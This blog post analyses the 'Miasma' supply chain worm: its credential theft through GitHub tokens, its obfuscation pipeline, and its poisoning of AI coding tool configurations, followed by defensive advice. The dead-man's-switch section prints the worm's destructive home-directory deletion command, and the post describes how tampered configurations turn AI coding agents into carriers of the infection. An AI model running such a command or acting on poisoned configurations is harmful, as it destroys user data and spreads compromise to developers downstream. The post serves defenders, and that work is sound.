ProBackend
ai agent security safety
1 week ago7 min read

The Miasma Worm: A Self-Replicating Supply Chain Attack Targeting AI Coding Agents

The Miasma worm is a credential-stealing supply chain attack framework that has compromised 73 Microsoft-affiliated GitHub repositories. This autonomous worm uses compromised developer credentials to spread through CI/CD pipelines and specifically targets environments with automated AI tools.

Vesper Lane

On June 10, 2026, security researchers at SafeDep disclosed that the "Miasma" credential-stealing attack framework—described as an evolution of the earlier Shai-Hulud worm—had been briefly open-sourced on GitHub. This incident marked a significant escalation in supply chain attacks, with the malware directly responsible for compromising 73 Microsoft-affiliated repositories on GitHub before the platform disabled them.

What makes Miasma particularly dangerous is its autonomous, worm-like self-propagation mechanism. Unlike traditional malware that requires human intervention or command-and-control infrastructure, Miasma uses GitHub itself as its coordination layer, infecting developer machines and leveraging stolen credentials to compromise legitimate repositories and packages. This self-sustaining cycle allows the worm to rapidly expand its reach, turning a single breach into a widespread attack affecting entire development ecosystems.

For more on AI-related security threats, see our guide to AI agent security & safety and the broader context of cybersecurity in the AI era.

Introduction

The Anatomy of a Supply Chain Worm

Miasma represents a sophisticated evolution in malware architecture, specifically designed to exploit modern software development practices. The framework operates by infecting developer machines, stealing build environments and cloud credentials, then using those privileges to compromise legitimate repositories and packages.

The malware can move laterally through SSH and AWS Systems Manager (SSM), and it specifically poisons configurations of AI coding tools such as Claude, Gemini, Cursor, Copilot, Kiro, and Cline. This AI-aware targeting is what makes Miasma particularly dangerous in the current development landscape.

One of the most alarming features is that Miasma requires no external command-and-control (C2) infrastructure to operate. Instead, it leverages GitHub itself as its coordination layer, using stolen tokens for exfiltration and coordination. This design makes detection significantly more difficult, as all traffic appears to be legitimate GitHub API calls.

For related insights on software supply chain security, see our coverage of software infrastructure threats and our detailed analysis of malware that targets AI coding tools.

The Anatomy of a Supply Chain Worm

Dead Man's Switch and Destructive Capabilities

The leaked Miasma source code reveals a disturbing "dead man's switch" feature. When the malware uses a victim's stolen GitHub token as an exfiltration channel, it installs a monitoring component that tracks the token's validity every minute. If the token is revoked—typically when security teams detect and revoke the compromised credentials—the malware executes a destructive command:

rm -rf ~/; rm -rf ~/Documents

This recursive deletion of files and directories in the user's home and Documents folders serves as both a destruction of evidence and a potential act of sabotage against the victim.

The monitor runs as a systemd user service on Linux or a LaunchAgent on macOS, and remains active for up to 72 hours. This ensures the destructive capability remains active even if the initial infection vector is removed.

To understand how threat actors use obfuscation techniques, see our technical deep dive on malware analysis and detection.

The Five-Stage Obfuscation Pipeline

SafeDep researchers identified a sophisticated five-stage build pipeline in the Miasma code that generates unique payloads for each build. This obfuscation process combines:

  1. Per-file AES-256-GCM encryption of embedded assets
  2. Randomized string obfuscation
  3. Source transformations
  4. JavaScript obfuscation
  5. A self-extracting loader that wraps the final payload in three layers of encryption

Random keys and a randomized outer encoding layer ensure that each generated sample differs from previous builds. This approach makes signature-based detection and static analysis significantly harder, as each instance of the malware appears unique to traditional security tools.

For additional context on how AI agents are transforming cybersecurity, explore our category on AI & National Security and our guide to malware analysis techniques.

The Shai-Hulud Legacy and Precedent Attacks

Miasma appears to be an evolution of the earlier Shai-Hulud worm, which was previously leaked on GitHub and shares much of the same features, techniques, and even code. The leak of Shai Hulud led to increased attack rates as threat actors adopted the code and created more advanced variants.

The malware has previously been linked to high-profile attacks against Red Hat npm packages and, more recently, the 73 Microsoft repositories on GitHub. In each incident, researchers observed the same pattern: compromise developer credentials, then use those privileges to publish trojanized versions of packages to npm, PyPI, and RubyGems.

This playbook has proven devastatingly effective. Once an AI coding agent or developer tool is compromised, it can automatically propagate the infection to every downstream user of those tools—creating an exponential spread pattern that traditional security controls are ill-equipped to handle.

For a comprehensive overview of cybersecurity threats, see our cybersecurity resource center and our coverage of supply chain attacks on enterprise systems.

Implications for AI Coding Tools

The specific targeting of AI coding tools—Claude, Gemini, Cursor, Copilot, Kiro, and Cline—represents a new frontier in supply chain attacks. These tools have deep access to developer environments and often operate with elevated privileges to automate tasks like code completion, pull request generation, and CI/CD pipeline management.

When Miasma poisons the configuration of these AI tools, it essentially gains a permanent backdoor into every developer's workflow. The tools can then automatically propagate the infection to repositories, packages, and other developers without any direct human interaction.

This creates a terrifying scenario where a single compromised AI tool can lead to company-wide compromise within hours, as the worm spreads through the normal cadence of development work. The automated nature of these tools means they can process hundreds or thousands of repository interactions daily, each one a potential vector for the worm to spread.

Organizations using AI coding tools should immediately:

  1. Audit all AI tool configurations for unauthorized modifications
  2. Review recent pull requests and CI/CD changes for signs of tampering
  3. Revoke and regenerate all developer tokens that may have been exposed
  4. Implement stricter approval workflows for AI tool integrations

For more on the evolving landscape of AI agent security, explore our detailed guide to AI Agent Security & Safety and our analysis of automated development tool vulnerabilities.

Defensive Recommendations

Security teams facing the Miasma threat should implement multiple layers of defense:

Credential Management

  • Implement least-privilege access for all developer credentials
  • Use short-lived tokens with automatic rotation
  • Monitor for anomalous API usage patterns

Build Environment Security

  • Isolate build environments from development machines
  • Implement code signing for all published packages
  • Use containerized build environments with restricted network access

CI/CD Pipeline Protection

  • Audit all repository dependencies regularly
  • Implement strict review processes for build configuration changes
  • Enable multi-factor authentication on all CI/CD accounts

AI Tool Governance

  • Maintain an inventory of all AI coding tools in use
  • Review tool configurations and permissions regularly
  • Implement network segmentation for AI tool traffic

Incident Response

  • Establish clear protocols for credential compromise
  • Prepare template takedown requests for malicious package removal
  • Maintain offline backups of critical code repositories

For comprehensive coverage of AI security threats and defensive strategies, explore our AI & National Security category and our detailed guide to defending against supply chain attacks.

Conclusion

The Miasma worm represents a watershed moment in supply chain security. Its autonomous propagation mechanism, targeting of AI coding tools, and destructive dead man's switch capability demonstrate a level of sophistication previously unseen in malware designed for developer environments.

The leak of its source code on GitHub—deliberately, not accidentally—echoes the earlier Shai-Hulud leak and is expected to lead to increased attack rates as threat actors adopt the code and create further variants. The self-replicating nature of the worm means that each new adoption increases the threat surface exponentially.

Organizations must treat AI-aware supply chain attacks as a new class of threat requiring specialized defense strategies. Traditional security controls that rely on signature detection are fundamentally inadequate against a malware that generates unique payloads for each infection and uses legitimate API traffic for coordination.

The incident underscores the urgent need for:

  1. Enhanced monitoring of developer credential usage
  2. Stricter controls on AI coding tool configurations
  3. Improved supply chain transparency and verification
  4. Rapid response capabilities for credential compromise incidents

As the attack landscape continues to evolve, security teams must prioritize defenses that can detect and respond to anomalies in real-time—before a single compromised credential spirals into company-wide or even industry-wide compromise.

For additional context on how AI is transforming cybersecurity, see our comprehensive guide to AI Agent Security & Safety and our analysis of cybersecurity threats in the AI era.

Related blogs

ai agent security safety

Fake Security Verification Frameworks Abuse Native macOS Utilities to Execute Hidden Infostealers

An in-depth analysis of the macOS ClickFix campaign, which leverages system commands to bypass manual interaction by silently downloading, mounting, and launching the Atomic macOS Stealer (AMOS), highlighting how the threat landscape is evolving to bypass user and OS boundaries.

3 hours ago · 5 minai agent security safety

Copilot SearchLeak Attack: A Critical Three-Stage Vulnerability Patched

A critical three-stage attack exploiting Microsoft 365 Copilot's search functionality allowed 1-click data theft. Learn how the SearchLeak vulnerability worked and what defenders need to know about this new wave of AI prompt-injection issues.

1 week ago · 5 minai agent security safety

Langflow Path Traversal Vulnerability CVE-2026-5027 Actively Exploited in Attacks

Attackers are actively exploiting a high-severity path traversal vulnerability in Langflow, the popular AI development platform. The flaw allows unauthenticated attackers to write arbitrary files on exposed servers, potentially leading to remote code execution. This article details the vulnerability, its exploitation timeline, and necessary mitigation steps.

1 week ago · 5 min
More engineering analysis and backend guidance from ProBackend.
More blogs